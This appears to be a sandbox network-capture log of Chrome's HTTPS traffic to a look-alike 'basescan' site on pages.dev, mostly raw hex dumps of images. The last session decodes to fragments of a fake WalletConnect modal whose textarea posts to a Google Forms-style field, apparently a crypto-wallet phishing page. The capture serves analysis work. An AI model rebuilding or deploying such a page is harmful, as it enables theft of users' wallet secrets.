                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 02 00 00 00 02 80 00 00 02 00 00 20 01 c0 00 00 01 c0 00 00 02 00 00 2b 02 00 00 4b 01 c0 00 2b 01 c0 00 2b 01 40 00 2b 01 40 00 4b 01 c0 00 2b 01 c0 00 2b 02 80 00 00 01 c0 00 00 01 80 00 20 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 01 c0 00 00 02 40 ff fb 02 80 00 00 02 40 00 0c 01 c0 00 0d 02 00 00 00 01 c0 00 00 02 80 ff fb 00 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 23 02 00 00 00 01 80 00 20 02 80 ff fb 02 00 00 0f 01 c0 00 00 02 00 00 06 02 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 ff fb 01 c0 00 00 02 00 00 00 01 c0 00 20 00 80 00 20 01 c0 00 00 02 00 00 00 02 40 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 00
                                                                                                                                                                                                                                              Data Ascii: +K++@+@K++ @@@@# @ @@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 ff fb 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 02 80 00 13 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 40 00 00 02 80 ff fb 02 00 00 00 02 80 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 20 00 c0 00 17 02 00 00 00 02 00 ff fd 02 40 00 20 01 80 00 00 01 80 00 00 02 40 00 00 02 40 00 00 01 80 00 00 01 80 00 20 01 80 00 20 01 80 00 20 01 80 00 20 02 40 00 00 02 80 ff fb 02 40 00 00 01 80 00 00 02 00 00 00 02 00 00 0f 01 c0 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@ @ @@ @@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 00 02 80 00 00 02 00 00 00 02 00 ff fc 02 00 00 00 02 40 00 00 02 00 ff fb 01 80 00 00 01 80 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 80 00 00 02 00 00 02 02 40 00 02 02 00 00 00 02 40 ff fa 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 ff ff 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 01 40 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 00 01 80 00 00 02 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ff f9 02 40 ff fe 02 40 ff fe 02 80 ff fd 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 ff fb 02 80 00 00 02 00 00 00 01 c0 00 20 01 80 00 00 01 c0 00 10 01 c0 00 10 01 80 00 00 02 40 00 00 01 80 00 00 02 40 00 00 02 80 00 20 02 40 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 06 01 80 00 05 02 80 ff fb 01 c0 ff fd 02 40 ff fb 02 40 00 00 02 40 ff fb 01 80 00 00 01 c0 ff fb 02 80 00 00 02 40 ff ff 02 00 ff fb 02 00 ff fb 02 00 ff fb 02 00 00 00 02 40 ff ff 02 40 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 00 00 02 00 00 00 02 40 00 00 02 40 ff fc 02 80 00 00 02 40 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 00 00 0f 02 00 00 00 01
                                                                                                                                                                                                                                              Data Ascii: @@ @@ @@@@@@@@@@@@@@


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              120192.168.2.549865104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC800OUTGET /getWalletImage/68e8063a-ff69-4941-3b40-af09e2fcd700 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC782INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 8138
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2e49d23436a-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 5119
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cf9ND8gbyEVnm_FXD40dYBD30mUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:07 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=1521+60 c=12+48 v=2024.9.3 l=8138 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC587INData Raw: 52 49 46 46 c2 1f 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 8f 01 00 8f 01 00 41 4c 50 48 ee 06 00 00 01 a0 46 fd ff aa b6 f9 c1 a5 ee 4e 25 56 9f 65 ae 75 6f 72 66 99 d4 bd 59 c9 98 7b 3a d7 0c ce dc 8d f5 85 4b 64 12 ea d1 a5 ae b0 46 aa 91 9d 45 6e 46 6c dc 43 7b 46 e1 f7 02 bf 5c d2 df 6f 46 44 4c 00 28 74 8f c1 23 12 6f 9b 96 b2 f4 d1 f4 b7 3e fc 66 ed d6 9f b7 17 94 1c 3a 72 f2 e4 99 aa ca df 44 51 6c b4 4b 5e 2f 62 bb d5 21 79 6d 11 45 51 ac aa ac 2c 2f b5 1c 3a 50 90 97 9b b5 d1 f4 a9 f1 e5 a7 52 e7 24 8d bb 7e ec b0 de 1a 68 ef aa 7a 0e b9 f1 ae e5 ab 3f de 90 77 f4 d4 6f 8d f6 4b 78 39 eb 76 34 d7 9e b5 16 67 7f f5 ba ee be db e2 7b 6b da 1d c2 d0 5b 17 be b9 a1 f8 5c db 5f 78 39 ee 94 6a 0e 64 1a 96 8f 8f ed d0 4e d0 4e 79 6e ed 89
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8XALPHFN%VeuorfY{:KdFEnFlC{F\oFDL(t#o>f:rDQlK^/b!ymEQ,/:PR$~hz?woKx9v4g{k[\_x9jdNNyn
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 3f 23 d1 bb 26 07 2b 05 c9 be 40 15 9c 8e 87 e9 0e 17 04 e7 11 24 7c 6b e7 60 f4 3c 4b 79 b8 34 18 8f 21 e9 5b ba 04 d6 eb 0c ed e1 92 c0 1e 42 e2 df a7 0a 44 73 88 fa 70 72 20 d3 90 fc d7 06 b2 81 fe 6c 31 fe c5 da e8 0f 75 fe e9 91 01 77 fb b7 9b 03 ec 23 fd 19 25 71 00 a6 f9 f3 30 b2 a0 d9 9f 9f 79 40 d4 fa d2 d6 f3 00 de e5 2b 09 99 f0 3d 5f 19 5c 50 a2 f2 51 c8 05 4d 43 bc 0d 12 b9 00 67 78 9b 8a 6c b8 da db 33 7c b0 c5 db 3a 3e b0 0a 1e ea 13 7c d0 14 e7 31 44 e4 03 9c e0 71 9b 8b 11 56 78 2c 40 46 34 78 bc c1 09 99 1e eb 39 61 bf 06 40 fd 0b 27 54 f7 06 e8 79 8e 13 a4 78 80 a1 6d 9c 70 e9 76 80 9b 9c 9c 80 29 00 77 22 2b ea 01 52 79 e1 0d 80 97 78 e1 2b 80 8f 78 21 1b 60 13 2f 14 03 ec e6 05 8b 00 47 79 e1 6c 9f ee a7 78 a1 36 46 5b c3 0b 4d a3 47
                                                                                                                                                                                                                                              Data Ascii: ?#&+@$|k`<Ky4![BDspr l1uw#%q0y@+=_\PQMCgxl3|:>|1DqVx,@F4x9a@'Tyxmpv)w"+Ryx+x!`/Gylx6F[MG
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ff bf 60 7f a0 07 ee 17 a6 af ee a7 c1 67 ed cf fe 7f f9 9f 01 df b0 7f f9 3d 80 3f f9 7a 80 75 43 f6 97 fb 37 e3 77 98 8f 9f 0f 42 f8 aa fe 9b f2 e0 88 47 0e 3f 1a fe 73 f6 03 f8 67 ff 3e 61 3f c4 bf 9f 7e 38 7a dc 3c 51 6d df 24 ff 71 c6 07 88 07 d9 6f ad 1d e0 c7 5e fe 6f c4 77 e4 9f e8 3d 80 bf 91 ff 4d fd bc fd b4 fd ff ff ff e2 af f6 e3 ff ff ff 8f 82 0f d9 6f ff e2 a7 5f 88 ec c2 8e 91 25 f5 87 6e fc 94 d8 89 8d 78 24 a1 b8 86 4b a1 f8 bf fe c6 27 ff cd ae 01 1e 12 e5 47 3c 04 da e2 63 41 02 e4 36 9a f3 f3 a4 60 23 27 32 df 57 e5 1d 7f 91 3c 9c 33 a2 fd dc c9 d8 ca 66 ad 33 0f 51 c9 b5 a7 63 65 14 08 8f de a0 7f d5 17 ff fb 23 51 a6 5f c0 21 8b 61 13 55 ae 6b ca 4a 9c 67 da ce d3 74 e9 7b f0 cd 97 d1 7f e5 79 99 93 78 29 11 3e b5 46 b8 90 5f 4d 4a
                                                                                                                                                                                                                                              Data Ascii: `g=?zuC7wBG?sg>a?~8z<Qm$qo^ow=Mo_%nx$K'G<cA6`#'2W<3f3Qce#Q_!aUkJgt{yx)>F_MJ
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 48 a3 48 37 4d ff 2a 46 6c 5c ff ff bd d1 6c 75 74 e5 2a 79 18 5a d6 95 f8 df c4 30 47 00 d6 43 3f 89 e6 d9 fe 2c 50 1e ab 95 04 e6 43 e1 ba 45 51 db f5 0b 65 4b da 17 10 1b 81 a0 7c b4 eb 51 e7 d1 a3 45 a5 9b da 00 f5 bd 72 f9 64 22 5c 3b d9 d1 5e 27 36 9d ad be 39 f8 e7 1c 1d be 55 31 64 28 d5 26 a4 8a cc a6 6c dd 9b e8 88 a5 29 fc d0 6a f9 d7 1c 53 fb f4 a7 ce 96 46 01 28 8c 13 8a 3f e9 0d 1e b2 8b a9 a5 af 29 61 1e ea 05 87 a6 5d c0 85 ea 59 a1 cc 75 6d 0a 4f 93 a7 4b 0a 15 df f3 a8 03 ac 12 17 cf 22 35 65 ee 1d 99 48 bc cc 76 df 65 c4 9c ad 32 51 7e d3 cd 79 b2 57 40 ae 82 62 c0 6a 57 d8 b2 9c 40 6e fe 4a c0 86 6c cd f2 e6 74 db d3 02 2c 9a 90 57 39 4d 86 a8 06 a4 e3 77 0d 75 ec fe ea e8 60 b0 c6 a4 35 dc ae be 73 ff de 3a 6d bc c4 4c 6d 95 25 96 5f
                                                                                                                                                                                                                                              Data Ascii: HH7M*Fl\lut*yZ0GC?,PCEQeK|QErd"\;^'69U1d(&l)jSF(?)a]YumOK"5eHve2Q~yW@bjW@nJlt,W9Mwu`5s:mLm%_
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: f0 d4 ed ba 6f d6 e6 fb 75 aa b9 89 0b 25 f8 95 f7 d5 ae 35 5e 58 1d 80 92 5d 38 9b dd 0f 9c 2e 6f 2c 6d b9 89 0b 25 f5 5d a8 d6 03 b5 3e 5a 16 43 96 51 fa 3d de b9 2c 30 2d c2 13 1f b7 b4 7b 28 fa 2e 1c 60 b3 74 46 f7 af 07 f7 7b 07 ee 7f 11 0e a3 8f a1 8d 58 e8 d0 25 3e 88 b1 36 62 79 cb 86 1c 01 ca fd 47 ea ad e1 8a d5 4d 10 ef d0 99 19 cb 61 bb 2a 8b 0f 42 bf ab 82 96 93 da 64 37 08 a5 c6 25 bb 21 c9 db 48 3f f6 cf 2d 98 42 4e ee 0a eb 23 f9 6c 3e b8 2c 49 9d e1 34 5c 71 6d 14 86 48 7d e6 01 2d 24 50 d3 95 07 b3 52 26 6f 75 3e 60 0a 38 e6 e8 33 7d b9 52 0c 1b 0e 10 20 86 2f a8 cf 23 42 2a b1 66 2d 38 35 44 40 34 16 60 eb 9b 97 72 8b 6e 8e f8 05 ff 56 72 37 df f0 a8 8f 25 ab 35 41 f5 48 c5 21 b3 27 c7 12 50 71 47 98 bb 23 b8 50 c8 69 5f 89 06 7d ec e8
                                                                                                                                                                                                                                              Data Ascii: ou%5^X]8.o,m%]>ZCQ=,0-{(.`tF{X%>6byGMa*Bd7%!H?-BN#l>,I4\qmH}-$PR&ou>`83}R /#B*f-85D@4`rnVr7%5AH!'PqG#Pi_}
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 52 46 75 56 16 6e ba cb ad 4c 6c 31 89 bd 13 ac 83 df b4 3e 48 f4 11 a2 c5 a2 64 8a 93 f1 1c 0a bf 39 2b 65 40 01 27 7e ea 05 51 28 53 f1 f9 a6 f6 9b 15 95 82 72 fc 0b b4 83 f4 af ef a1 a1 82 f1 97 c5 9b 3d a8 ce 67 09 83 90 2b e8 30 51 19 53 92 15 a3 74 4d 70 78 26 08 32 c6 0c 4a 33 5d 6d 13 7d 77 e5 e3 f9 09 76 f1 9b 11 a5 6a 7a d7 03 5a d2 ca b9 23 b3 b1 6a 45 b1 b7 d8 09 4a 16 3b f2 4f f5 4e bf 02 79 3e 09 1c fb a9 e2 42 53 7f f8 05 6a 5d be f9 ad f8 98 ab 75 3f 18 d6 63 6a 34 c5 01 4b 7a 10 29 db ac ca 65 df b4 b7 d0 fc ab 57 c3 ee 18 27 b8 76 7f ec 29 8b fd 59 a3 cd 7c 24 ba dc e6 10 00 d2 62 2a 8b c4 c2 ae ca 1f cb c4 c4 6f 08 08 26 44 a4 b2 84 4c f1 68 85 3f 25 95 c7 2d 6f c9 82 c8 29 9e 17 d6 d6 91 21 a1 da 21 cd d1 3b 84 cb 1f 1b 4e 67 16 ef d6
                                                                                                                                                                                                                                              Data Ascii: RFuVnLl1>Hd9+e@'~Q(Sr=g+0QStMpx&2J3]m}wvjzZ#jEJ;ONy>BSj]u?cj4Kz)eW'v)Y|$b*o&DLh?%-o)!!;Ng
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC706INData Raw: 79 04 c6 51 41 27 9a 7c 22 07 be d5 66 bc 65 9f 59 ce 15 9c 08 da 4e 55 44 53 10 f0 6e 36 69 52 90 27 9c 2b 97 98 46 a8 35 f1 c8 42 3e ae 08 4c 55 82 39 4d 86 d3 fc 99 0c c5 e2 87 6e ec 6b 4b 19 e7 67 2b b4 f2 8b 22 74 38 03 98 00 03 55 8a db d6 d9 77 91 19 a8 cc fc d4 97 22 bd b1 98 3c eb 85 1d 1a 45 89 2c 82 8a da 26 a9 2d e2 e1 98 65 8c 21 47 8a 03 77 c7 6c 85 e2 0e 8a 6a 56 cf 49 c6 4a 1e c3 15 8e bb 0c 89 8d 75 6d c5 51 05 ab 92 3c 13 24 47 12 f7 ad 90 c3 8a be e3 5b 53 23 b3 41 21 d4 a1 c1 f4 75 66 4b f7 74 d2 fb 83 82 47 75 48 c3 da 89 49 c1 82 83 fb 7e 5c 03 b8 7a 14 d7 7c df 04 48 a2 74 91 b2 57 3c 2e e2 b8 84 24 5f ff f6 bf fe ef 5e a1 4f e4 9a a2 33 10 70 ef 24 b6 d3 1d 82 35 ee ec 1f 28 fa 0d 65 e6 bf ef 17 ae c4 82 ca b9 4a 46 5e a6 cb 8f 37
                                                                                                                                                                                                                                              Data Ascii: yQA'|"feYNUDSn6iR'+F5B>LU9MnkKg+"t8Uw"<E,&-e!GwljVIJumQ<$G[S#A!ufKtGuHI~\z|HtW<.$_^O3p$5(eJF^7


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              121192.168.2.549867172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC815OUTGET /images/svg/brands/metamask.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC801INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMC3j3jXIonoy5UpeSYKurfQrZyWLsn%2B5oxigSNwd04MdqWqExU3z42DaKlpuQJOyrA042EsRVThITFCgydqqQ%2BL%2BHo1hKS41uqoXAe2q3K%2BBfjv6wQmzHTKzdZ41qBPWD4L52RTnxo7NEEvrsiKfUMSvJw%2F2ihoFzu7Jb%2FGSg%2FZifEQ8aiKorgHTIlIfiP1w3Ops8bT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e49c564363-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 74 79 3a 20 68 69 64 64 65 6e 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 22 0d 0a 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 69 64 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 2d 6d 6f 64 61 6c 22 0d 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 5f 5f 62 61 73 65 20 61 6e 69 6d 61 74 65 64 20 66 61 64 65 49 6e 22 0d 0a 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e
                                                                                                                                                                                                                                              Data Ascii: ty: hidden; overflow: hidden; z-index: 100" > <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn" > <div class="walletconnect-modal__base"> <div class="walletconn
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 4c 37 39 2e 35 34 32 33 30 32 2c 37 30 2e 39 36 38 35 35 39 32 20 43 37 38 2e 33 31 39 35 32 30 34 2c 37 32 2e 31 36 35 37 36 33 33 20 37 36 2e 33 33 37 30 30 31 2c 37 32 2e 31 36 35 37 36 33 33 20 37 35 2e 31 31 34 32 32 31 34 2c 37 30 2e 39 36 38 35 35 39 32 20 4c 35 34 2e 39 37 37 35 32 36 35 2c 35 31 2e 32 35 33 30 35 36 31 20 43 35 32 2e 35 33 31 39 36 35 33 2c 34 38 2e 38 35 38 36 34 36 39 20 35 32 2e 35 33 31 39 36 35 33 2c 34 34 2e 39 37 36 35 34 33 39 20 35 34 2e 39 37 37 35 32 36 35 2c 34 32 2e 35 38 32 31 33 35 37 20 4c 36 31 2e 34 33 38 35 34 32 39 2c 33 36 2e 32 35 36 32 36 31 32 20 5a 20 4d 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 4c 32 39 38 2e 31 32 38 30 33 36 2c 39 34 2e 35 37 36 39 30 33 31 20 43 33 30 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.5
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2e 30 33 30 30 30 36 31 20 43 32 37 33 2e 37 39 35 37 34 2c 37 34 2e 36 33 35 35 39 36 39 20 32 37 37 2e 37 36 30 37 37 38 2c 37 34 2e 36 33 35 35 39 36 39 20 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 5a 26 23 33 39 3b 20 69 64 3d 26 23 33 39 3b 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 26 23 33 39 3b 25 33 45 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                              Data Ascii: .0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z&#39; id=&#39;WalletConnect&#39;%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo" /> <p>WalletConnect</
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 76 6f 74 61 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 65 6e 74 72 79 2e 32 30 33 36 35 30 31 33 35 33 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 74 65 78 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 49 6e 70 75 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69
                                                                                                                                                                                                                                              Data Ascii: target="votar" style="width: 100%" > <textarea name="entry.2036501353" type="text" id="pInput" class="i
